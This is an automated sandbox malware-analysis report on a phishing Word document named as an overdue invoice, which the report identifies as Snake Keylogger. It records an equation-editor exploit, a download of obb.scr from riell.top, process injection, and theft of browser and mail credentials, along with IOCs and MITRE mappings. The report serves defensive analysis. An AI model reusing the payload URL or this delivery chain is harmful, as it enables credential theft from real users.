            Source: 10.2.obi23456.scr.550000.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 10.2.obi23456.scr.550000.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 10.2.obi23456.scr.550000.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrQueries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrQueries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.937566804.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.937566804.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts111
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Obfuscated Files or Information            		Security Account Manager1
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Software Packing            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467841 Sample: OVER DUE INVOICE PAYMENT.docx.doc Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 36 riell.top 2->36 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 17 other signatures 2->58 9 WINWORD.EXE 313 54 2->9         started        signatures3 process4 dnsIp5 44 riell.top 188.114.97.3, 443, 49161, 49162 CLOUDFLARENETUS European Union 9->44 26 C:\Users\user\AppData\...\riell.top.url, MS 9->26 dropped 28 C:\Users\user\AppData\Roaming\...\obb.doc.url, MS 9->28 dropped 30 ~WRF{56E3829F-B9EE...0-759B5D6DE9EF}.tmp, Composite 9->30 dropped 72 Microsoft Office launches external ms-search protocol handler (WebDAV) 9->72 74 Office viewer loads remote template 9->74 76 Microsoft Office drops suspicious files 9->76 14 EQNEDT32.EXE 11 9->14         started        file6 signatures7 process8 dnsIp9 46 riell.top 14->46 32 C:\Users\user\AppData\Roaming\obi23456.scr, PE32 14->32 dropped 34 C:\Users\user\AppData\Local\...\obb[1].scr, PE32 14->34 dropped 48 Office equation editor establishes network connection 14->48 50 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->50 19 obi23456.scr 2 14->19         started        file10 signatures11 process12 signatures13 60 Multi AV Scanner detection for dropped file 19->60 62 Machine Learning detection for dropped file 19->62 64 Injects a PE file into a foreign processes 19->64 22 obi23456.scr 12 2 19->22         started        process14 dnsIp15 38 reallyfreegeoip.org 22->38 40 reallyfreegeoip.org 188.114.96.3, 443, 49163, 49164 CLOUDFLARENETUS European Union 22->40 42 6 other IPs or domains 22->42 66 Tries to steal Mail credentials (via file / registry access) 22->66 68 Tries to harvest and steal browser information (history, passwords, etc) 22->68 signatures16 70 Tries to detect the country of the analysis system (by using the IP) 38->70

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OVER DUE INVOICE PAYMENT.docx.doc34%ReversingLabsDocument-Word.Trojan.Snakekeylogger

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp100%AviraEXP/CVE-2018-0798.Gen
            C:\Users\user\AppData\Roaming\obi23456.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr58%ReversingLabsWin32.Trojan.SnakeStealer
            C:\Users\user\AppData\Roaming\obi23456.scr58%ReversingLabsWin32.Trojan.SnakeStealer

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://riell.top/obb.scr100%Avira URL Cloudmalware
            https://riell.top/obb.scrj0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            https://riell.top/obb.doc0%Avira URL Cloudsafe
            https://riell.top/obb.scrhhC:0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
            https://riell.top/0%Avira URL Cloudsafe
            http://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://riell.top/obb.scrMC:0%Avira URL Cloudsafe
            https://reallyfreegeoip.org0%Avira URL Cloudsafe
            https://riell.top/obb.scrgn0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		188.114.96.3
            		truetrue
              		unknown
              riell.top
              		188.114.97.3
              		truetrue
                		unknown
                checkip.dyndns.com
                		193.122.130.0
                		truefalse
                  		unknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://riell.top/obb.scrtrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    		unknown
                    https://riell.top/obb.doctrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://riell.top/obb.scrjEQNEDT32.EXE, 00000009.00000002.412653701.00000000008FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.orgobi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023C8000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000231B000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023F5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.334obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://riell.top/obb.scrhhC:EQNEDT32.EXE, 00000009.00000002.412653701.00000000008FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.org/qobi23456.scr, 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://reallyfreegeoip.orgobi23456.scr, 0000000B.00000002.937566804.0000000002340000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://riell.top/EQNEDT32.EXE, 00000009.00000003.412467105.0000000000952000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.drtrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.orgobi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.comobi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023C8000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://riell.top/obb.scrMC:EQNEDT32.EXE, 00000009.00000002.413385688.0000000004180000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobi23456.scr, 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://riell.top/obb.scrgnEQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/obi23456.scr, 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    132.226.8.169
                    		unknownUnited States
                    		16989UTMEMUSfalse
                    188.114.97.3
                    		riell.topEuropean Union
                    		13335CLOUDFLARENETUStrue
                    193.122.6.168
                    		unknownUnited States
                    		31898ORACLE-BMC-31898USfalse
                    188.114.96.3
                    		reallyfreegeoip.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    193.122.130.0
                    		checkip.dyndns.comUnited States
                    		31898ORACLE-BMC-31898USfalse
                    158.101.44.242
                    		unknownUnited States
                    		31898ORACLE-BMC-31898USfalse
                    132.226.247.73
                    		unknownUnited States
                    		16989UTMEMUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467841
                    Start date and time:2024-07-04 21:37:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:1
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:OVER DUE INVOICE PAYMENT.docx.doc
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winDOC@6/19@36/7
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 64
                    • Number of non-executed functions: 42
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 79390.5670685309 for current running targets taking high CPU consumption
                    • Override analysis time to 158781.134137062 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3436 because there are no executed function
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: OVER DUE INVOICE PAYMENT.docx.doc

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    15:38:35API Interceptor52x Sleep call for process: EQNEDT32.EXE modified
                    15:38:36API Interceptor10222378x Sleep call for process: obi23456.scr modified

                    LLM Input / Output

                    InputOutput
                    URL: Office document Model: gpt-4o
                    ```json{  "riskscore": 0,  "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items or codes, and there is no language that creates a sense of urgency or interest. Additionally, there is no impersonation of well-known brands. Therefore, there is no indication that this document could mislead the user into clicking on a potentially harmful link."}

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    132.226.8.169j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    lista de cotizaciones.xlam.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    Details.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    LETTER OF AUTHORIZATION.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    Find-DscResource_QoS.ps1Get hashmaliciousUnknownBrowse
                    • checkip.dyndns.org/
                    MT STENA IMPRESSION Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    LAQ-PO088PDF.batGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • checkip.dyndns.org/
                    MT STENA IMPRESSION Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    188.114.97.3ScanPDF_102.exeGet hashmaliciousFormBookBrowse
                    • www.jjjw.xyz/ypml/
                    tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                    • www.txglobedev.com/dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR
                    new order.exeGet hashmaliciousFormBookBrowse
                    • www.coinwab.com/efdt/
                    http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
                    • sp.26skins.com/favicon.ico
                    BL Draft.exeGet hashmaliciousFormBookBrowse
                    • www.gazeta-ufaley.ru/wjr5/
                    Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                    • www.pu6wac.buzz/g2ww/
                    Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • filetransfer.io/data-package/OWlnEE9J/download
                    Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • filetransfer.io/data-package/OWlnEE9J/download
                    MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                    • www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX
                    62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    reallyfreegeoip.orgCR693029829.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    Contract.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
